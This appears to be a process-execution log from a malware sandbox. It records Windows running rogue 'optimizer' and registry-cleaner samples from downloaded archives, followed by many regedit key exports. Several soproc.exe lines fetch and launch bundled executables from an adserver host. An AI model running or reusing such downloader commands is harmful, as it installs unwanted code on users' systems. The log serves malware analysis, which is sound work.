"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2964 -childID 1 -isForBrowser -prefsHandle 3240 -prefMapHandle 3248 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {90fc16bd-e58c-4f03-bf7d-2ec01c7d469f} 4528 "\\.\pipe\gecko-crash-server-pipe.4528" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2704 -childID 2 -isForBrowser -prefsHandle 3620 -prefMapHandle 3616 -prefsLen 29088 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e5b70ebf-9f18-4373-870c-65b2d8e3d05b} 4528 "\\.\pipe\gecko-crash-server-pipe.4528" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4240 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4244 -prefMapHandle 4264 -prefsLen 29088 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bc10bd96-f782-44ed-b14d-d6a4d758add2} 4528 "\\.\pipe\gecko-crash-server-pipe.4528" utility

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5388 -childID 3 -isForBrowser -prefsHandle 5380 -prefMapHandle 5372 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b3e14987-5542-4569-965a-3d3ca3298278} 4528 "\\.\pipe\gecko-crash-server-pipe.4528" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5540 -childID 4 -isForBrowser -prefsHandle 5548 -prefMapHandle 5552 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d61802db-1661-4c5e-a010-ada9c89200c7} 4528 "\\.\pipe\gecko-crash-server-pipe.4528" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5740 -childID 5 -isForBrowser -prefsHandle 5752 -prefMapHandle 5756 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ed30a662-82b9-43bd-8cd4-bce958dfcb75} 4528 "\\.\pipe\gecko-crash-server-pipe.4528" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7064 -childID 6 -isForBrowser -prefsHandle 6920 -prefMapHandle 6936 -prefsLen 33996 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6074eeeb-6084-463d-8410-36421699e55c} 4528 "\\.\pipe\gecko-crash-server-pipe.4528" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5752 -childID 7 -isForBrowser -prefsHandle 6616 -prefMapHandle 6604 -prefsLen 31021 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {35808e43-a6e6-4de2-9d3a-8470971cf285} 4528 "\\.\pipe\gecko-crash-server-pipe.4528" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5416 -childID 8 -isForBrowser -prefsHandle 6092 -prefMapHandle 6080 -prefsLen 31021 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {070ebd82-bc8a-48c3-bf26-a7fbf1f613ad} 4528 "\\.\pipe\gecko-crash-server-pipe.4528" tab

C:\Users\Admin\Downloads\7z2407-x64.exe

"C:\Users\Admin\Downloads\7z2407-x64.exe"

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\AdvancedSystemOptimizer.7z"

C:\Users\Admin\Desktop\[email protected]

"C:\Users\Admin\Desktop\[email protected]"

C:\Users\Admin\AppData\Local\Temp\is-KE31S.tmp\is-SUFUB.tmp

"C:\Users\Admin\AppData\Local\Temp\is-KE31S.tmp\is-SUFUB.tmp" /SL4 $C024C C:\Users\Admin\Desktop\[email protected] 9172173 50688

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\RegistryCleaner.7z"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5948 -childID 9 -isForBrowser -prefsHandle 4384 -prefMapHandle 5748 -prefsLen 31077 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {81341aee-5c92-441a-915f-900107782e84} 4528 "\\.\pipe\gecko-crash-server-pipe.4528" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3592 -childID 10 -isForBrowser -prefsHandle 4256 -prefMapHandle 6076 -prefsLen 31077 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c2a6353d-03f5-42a3-913a-90a8926a844e} 4528 "\\.\pipe\gecko-crash-server-pipe.4528" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6096 -childID 11 -isForBrowser -prefsHandle 7252 -prefMapHandle 7248 -prefsLen 31077 -prefMapSize 244658 -jsInitHandle 972 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {82738c68-a38c-47e9-bff4-e47df3b66032} 4528 "\\.\pipe\gecko-crash-server-pipe.4528" tab

C:\Users\Admin\Desktop\[email protected]

"C:\Users\Admin\Desktop\[email protected]"

C:\Users\Admin\AppData\Local\Temp\GLB8D92.tmp

C:\Users\Admin\AppData\Local\Temp\GLB8D92.tmp 4736 C:\Users\Admin\Desktop\ENDERM~3.EXE

C:\Users\Admin\AppData\Local\Temp\GLJ8DC2.tmp

"C:\Users\Admin\AppData\Local\Temp\GLJ8DC2.tmp" C:\Program Files (x86)\Registry Cleaner Trial\AffCreatorDLL.dll

C:\PROGRA~2\SOFTWA~1\soproc.exe

"C:\PROGRA~2\SOFTWA~1\soproc.exe" -pu soreporter -proc soreporter -pack SoRefRegSoAlertWxLiteNnAj -job regclean -action useraccept

C:\PROGRA~2\SOFTWA~1\soproc.exe

"C:\PROGRA~2\SOFTWA~1\soproc.exe" -pu soreporter -proc soreporter -pack SoRefRegSoAlertWxLiteNnAj -job soalert -action useraccept

C:\PROGRA~2\SOFTWA~1\soproc.exe

"C:\PROGRA~2\SOFTWA~1\soproc.exe" -pu soalertdnld -proc sostreamer -pack SoRefRegSoAlertWxLiteNnAj -job soalert -url http://adserver.sharewareonline.com/bundle/soalert.exe -cmd {-setup} -longslowpace y

C:\PROGRA~2\SOFTWA~1\soproc.exe

"C:\PROGRA~2\SOFTWA~1\soproc.exe" -pu soreporter -proc soreporter -pack SoRefRegSoAlertWxLiteNnAj -job weatherbug -action userreject

C:\PROGRA~2\SOFTWA~1\soproc.exe

"C:\PROGRA~2\SOFTWA~1\soproc.exe" -pu soreporter -proc soreporter -pack SoRefRegSoAlertWxLiteNnAj -job newdotnet -action useraccept

C:\PROGRA~2\SOFTWA~1\soproc.exe

"C:\PROGRA~2\SOFTWA~1\soproc.exe" -pu sostreamer -proc sostreamer -pack SoRefRegSoAlertWxLiteNnAj -job newdotnet -url http://adserver.sharewareonline.com/bundle/nn.exe -target C:\Users\Admin\AppData\Local\Temp\NNCPUR638.exe

C:\PROGRA~2\SOFTWA~1\soproc.exe

"C:\PROGRA~2\SOFTWA~1\soproc.exe" -pu soreporter -proc soreporter -pack SoRefRegSoAlertWxLiteNnAj -job askjeeves -action useraccept

C:\PROGRA~2\SOFTWA~1\soproc.exe

"C:\PROGRA~2\SOFTWA~1\soproc.exe" -pu sostreamer -proc sostreamer -pack SoRefRegSoAlertWxLiteNnAj -job askjeeves -url http://adserver.sharewareonline.com/bundle/aj.exe -verif y

C:\PROGRA~2\REGIST~1\RegClean.exe

"C:\PROGRA~2\REGIST~1\RegClean.exe"

C:\Users\Admin\Desktop\Endermanch@RegistryCleaner_SOReferral.exe

"C:\Users\Admin\Desktop\Endermanch@RegistryCleaner_SOReferral.exe"

C:\Users\Admin\AppData\Local\Temp\GLB1967.tmp

C:\Users\Admin\AppData\Local\Temp\GLB1967.tmp 4736 C:\Users\Admin\Desktop\ENC9FB~1.EXE

C:\PROGRA~2\REGIST~1\RegClean.exe

"C:\PROGRA~2\REGIST~1\RegClean.exe"

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\CPURocket.7z"

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\CPURocket.7z"

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x000000000000044C 0x00000000000004CC

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Users\Admin\Desktop\[email protected]

"C:\Users\Admin\Desktop\[email protected]"

C:\Users\Admin\Desktop\Endermanch@CPURocket_Adm.exe

"C:\Users\Admin\Desktop\Endermanch@CPURocket_Adm.exe"

C:\Windows\system32\srtasks.exe

C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2

C:\Windows\SysWOW64\regedit.exe

/e "1.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3F1-4981-101B-9CA8-9240CE2738AE}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "2.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3F0-4981-101B-9CA8-9240CE2738AE}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "3.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3F0-4981-101B-9CA8-9240CE2738AE}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "4.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3F1-4981-101B-9CA8-9240CE2738AE}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "5.reg" "HKEY_CLASSES_ROOT\Interface\{9D613F8A-B30E-4938-8490-CB5677701EBF}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "6.reg" "HKEY_CLASSES_ROOT\Interface\{9D613F8A-B30E-4938-8490-CB5677701EBF}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "7.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3F1-4981-101B-9CA8-9240CE2738AE}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "8.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3EE-4981-101B-9CA8-9240CE2738AE}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "9.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3EE-4981-101B-9CA8-9240CE2738AE}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "10.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3EE-4981-101B-9CA8-9240CE2738AE}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "11.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3EF-4981-101B-9CA8-9240CE2738AE}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "12.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3F0-4981-101B-9CA8-9240CE2738AE}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "13.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3EF-4981-101B-9CA8-9240CE2738AE}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "14.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3EF-4981-101B-9CA8-9240CE2738AE}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "15.reg" "HKEY_CLASSES_ROOT\Interface\{A98639A1-CB0C-4A5C-A511-96547F752ACD}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "16.reg" "HKEY_CLASSES_ROOT\Interface\{a7126d4c-f492-4eb9-8a2a-f673dbdd3334}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "17.reg" "HKEY_CLASSES_ROOT\Interface\{a7126d4c-f492-4eb9-8a2a-f673dbdd3334}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "18.reg" "HKEY_CLASSES_ROOT\Interface\{ABFA087C-F703-4D53-946E-37FF82B2C994}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "19.reg" "HKEY_CLASSES_ROOT\Interface\{AEEBAD4E-3E0A-415B-9B94-19C499CD7B6A}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "20.reg" "HKEY_CLASSES_ROOT\Interface\{ACDB5DB0-C9D5-461C-BAAA-5DCE0B980E40}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "21.reg" "HKEY_CLASSES_ROOT\Interface\{ACDB5DB0-C9D5-461C-BAAA-5DCE0B980E40}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "22.reg" "HKEY_CLASSES_ROOT\Interface\{9E1CD0DF-72E7-4284-9598-342C0A46F96B}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "23.reg" "HKEY_CLASSES_ROOT\Interface\{9E1CD0DF-72E7-4284-9598-342C0A46F96B}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "24.reg" "HKEY_CLASSES_ROOT\Interface\{9E0BD17B-2D3C-4656-B94D-03084F3FD9D4}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "25.reg" "HKEY_CLASSES_ROOT\Interface\{A4C466B8-499F-101B-BB78-00AA00383CBB}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "26.reg" "HKEY_CLASSES_ROOT\Interface\{A4C46780-499F-101B-BB78-00AA00383CBB}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "27.reg" "HKEY_CLASSES_ROOT\Interface\{A4C46780-499F-101B-BB78-00AA00383CBB}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "28.reg" "HKEY_CLASSES_ROOT\Interface\{A4C466B8-499F-101B-BB78-00AA00383CBB}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "29.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3ED-4981-101B-9CA8-9240CE2738AE}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "30.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3E7-4981-101B-9CA8-9240CE2738AE}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "31.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3E7-4981-101B-9CA8-9240CE2738AE}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "32.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3E6-4981-101B-9CA8-9240CE2738AE}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "33.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3E7-4981-101B-9CA8-9240CE2738AE}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "34.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3E8-4981-101B-9CA8-9240CE2738AE}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "35.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3E8-4981-101B-9CA8-9240CE2738AE}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "36.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3E8-4981-101B-9CA8-9240CE2738AE}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "37.reg" "HKEY_CLASSES_ROOT\Interface\{91C7765F-ED57-49AD-8B01-DC24816A5294}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "38.reg" "HKEY_CLASSES_ROOT\Interface\{919AA22C-B9AD-11D3-8D59-0050048384E3}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "39.reg" "HKEY_CLASSES_ROOT\Interface\{8E8304B8-CBD1-44F8-B0E8-89C625B2002E}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "40.reg" "HKEY_CLASSES_ROOT\Interface\{944903E8-B03F-43A0-8341-872200D2DA9C}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "41.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3E6-4981-101B-9CA8-9240CE2738AE}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "42.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3E6-4981-101B-9CA8-9240CE2738AE}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "43.reg" "HKEY_CLASSES_ROOT\Interface\{944903E8-B03F-43A0-8341-872200D2DA9C}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "44.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3EC-4981-101B-9CA8-9240CE2738AE}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "45.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3EB-4981-101B-9CA8-9240CE2738AE}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "46.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3EB-4981-101B-9CA8-9240CE2738AE}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "47.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3EC-4981-101B-9CA8-9240CE2738AE}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "48.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3ED-4981-101B-9CA8-9240CE2738AE}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "49.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3ED-4981-101B-9CA8-9240CE2738AE}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "50.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3EC-4981-101B-9CA8-9240CE2738AE}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "51.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3E9-4981-101B-9CA8-9240CE2738AE}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "52.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3E9-4981-101B-9CA8-9240CE2738AE}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "53.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3E9-4981-101B-9CA8-9240CE2738AE}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "54.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3EA-4981-101B-9CA8-9240CE2738AE}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "55.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3EB-4981-101B-9CA8-9240CE2738AE}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "56.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3EA-4981-101B-9CA8-9240CE2738AE}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "57.reg" "HKEY_CLASSES_ROOT\Interface\{9B4CD3EA-4981-101B-9CA8-9240CE2738AE}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "58.reg" "HKEY_CLASSES_ROOT\Interface\{C5B6042B-FD21-404A-A0EF-E2FBB52B9080}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "59.reg" "HKEY_CLASSES_ROOT\Interface\{C52D32DD-F2B4-4052-8502-EC4305ECB71F}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "60.reg" "HKEY_CLASSES_ROOT\Interface\{C4D651F2-7697-11D1-A1E9-00A0C90F2731}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "61.reg" "HKEY_CLASSES_ROOT\Interface\{C9590FA7-2132-47FB-9A78-AF0BF19AF4E6}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "62.reg" "HKEY_CLASSES_ROOT\Interface\{CBB76011-C508-11D1-A3E3-00A0C90AEA82}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "63.reg" "HKEY_CLASSES_ROOT\Interface\{CBB76011-C508-11D1-A3E3-00A0C90AEA82}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "64.reg" "HKEY_CLASSES_ROOT\Interface\{C987A3FC-A6E7-4ED2-AED8-A08C3E1CC6DE}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "65.reg" "HKEY_CLASSES_ROOT\Interface\{C4D651F0-7697-11D1-A1E9-00A0C90F2731}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "66.reg" "HKEY_CLASSES_ROOT\Interface\{C2FE84F5-E036-4A07-950C-9BFD3EAB983A}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "67.reg" "HKEY_CLASSES_ROOT\Interface\{C2FE84F5-E036-4A07-950C-9BFD3EAB983A}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "68.reg" "HKEY_CLASSES_ROOT\Interface\{C4D651F0-7697-11D1-A1E9-00A0C90F2731}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "69.reg" "HKEY_CLASSES_ROOT\Interface\{C4D651F2-7697-11D1-A1E9-00A0C90F2731}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "70.reg" "HKEY_CLASSES_ROOT\Interface\{C4D651F1-7697-11D1-A1E9-00A0C90F2731}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "71.reg" "HKEY_CLASSES_ROOT\Interface\{C4D651F1-7697-11D1-A1E9-00A0C90F2731}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "72.reg" "HKEY_CLASSES_ROOT\Interface\{D7FA6F5E-9122-4900-8846-5AB0A5499D52}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "73.reg" "HKEY_CLASSES_ROOT\Interface\{D7FA6F5E-9122-4900-8846-5AB0A5499D52}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "74.reg" "HKEY_CLASSES_ROOT\Interface\{D4E0F020-720A-11CF-8136-00AA00C14959}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "75.reg" "HKEY_CLASSES_ROOT\Interface\{d8c80ebb-099c-4208-afa3-fbc4d11f8a3c}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "76.reg" "HKEY_CLASSES_ROOT\Interface\{da82e55e-fa2f-45b3-aec3-e7294106ef52}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "77.reg" "HKEY_CLASSES_ROOT\Interface\{da82e55e-fa2f-45b3-aec3-e7294106ef52}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "78.reg" "HKEY_CLASSES_ROOT\Interface\{d8c80ebb-099c-4208-afa3-fbc4d11f8a3c}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "79.reg" "HKEY_CLASSES_ROOT\Interface\{D0ED5C72-6197-4AAD-9B16-53FE461DD85C}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "80.reg" "HKEY_CLASSES_ROOT\Interface\{D0ED5C72-6197-4AAD-9B16-53FE461DD85C}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "81.reg" "HKEY_CLASSES_ROOT\Interface\{CDDE3804-2064-11CF-867F-00AA005FF34A}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "82.reg" "HKEY_CLASSES_ROOT\Interface\{D358F4E1-0465-4965-9DD5-CAE303D2C345}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "83.reg" "HKEY_CLASSES_ROOT\Interface\{D4E0F020-720A-11CF-8136-00AA00C14959}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "84.reg" "HKEY_CLASSES_ROOT\Interface\{D3F22039-E3CF-4FC4-9A30-426A46056B8C}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "85.reg" "HKEY_CLASSES_ROOT\Interface\{D3F22039-E3CF-4FC4-9A30-426A46056B8C}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "86.reg" "HKEY_CLASSES_ROOT\Interface\{c1439245-96b4-47fc-b391-679386c5d40f}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "87.reg" "HKEY_CLASSES_ROOT\Interface\{B54E7079-90C9-4C62-A6B8-B2834C33A04A}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "88.reg" "HKEY_CLASSES_ROOT\Interface\{B32C099E-C5D8-4E7C-9563-3D574C42C2FE}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "89.reg" "HKEY_CLASSES_ROOT\Interface\{B32C099E-C5D8-4E7C-9563-3D574C42C2FE}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "90.reg" "HKEY_CLASSES_ROOT\Interface\{B54E7079-90C9-4C62-A6B8-B2834C33A04A}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "91.reg" "HKEY_CLASSES_ROOT\Interface\{b5c25645-7426-433f-8a5f-42b7ff27a7b2}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "92.reg" "HKEY_CLASSES_ROOT\Interface\{B5ADE81E-0E61-4FE1-81C6-C333E4FFE0F1}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "93.reg" "HKEY_CLASSES_ROOT\Interface\{B58845F4-9970-4D87-A636-169FB82ED642}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "94.reg" "HKEY_CLASSES_ROOT\Interface\{AF60000F-661D-472A-9588-F062F6DB7A0E}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "95.reg" "HKEY_CLASSES_ROOT\Interface\{AF45AF49-D6AA-407D-BF87-3912236E9D94}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "96.reg" "HKEY_CLASSES_ROOT\Interface\{AEEBAD4E-3E0A-415B-9B94-19C499CD7B6A}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "97.reg" "HKEY_CLASSES_ROOT\Interface\{AF60000F-661D-472A-9588-F062F6DB7A0E}\TypeLib"

C:\Windows\SysWOW64\regedit.exe

/e "98.reg" "HKEY_CLASSES_ROOT\Interface\{B28FA150-0FF0-11CF-A911-00AA0062BB4C}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "99.reg" "HKEY_CLASSES_ROOT\Interface\{B28FA150-0FF0-11CF-A911-00AA0062BB4C}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "100.reg" "HKEY_CLASSES_ROOT\Interface\{B05D37A9-03A2-45CF-8850-F660DF0CBF07}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "101.reg" "HKEY_CLASSES_ROOT\Interface\{C0324960-2AAA-11CF-AD67-00AA00614F3E}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "102.reg" "HKEY_CLASSES_ROOT\Interface\{BE8F9800-2AAA-11CF-AD67-00AA00614F3E}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "103.reg" "HKEY_CLASSES_ROOT\Interface\{BE8F9800-2AAA-11CF-AD67-00AA00614F3E}\ProxyStubClsid"

C:\Windows\SysWOW64\regedit.exe

/e "104.reg" "HKEY_CLASSES_ROOT\Interface\{C0324960-2AAA-11CF-AD67-00AA00614F3E}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

/e "105.reg" "HKEY_CLASSES_ROOT\Interface\{c1439245-96b4-47fc-b391-679386c5d40f}\ProxyStubClsid32"

C:\Windows\SysWOW64\regedit.exe

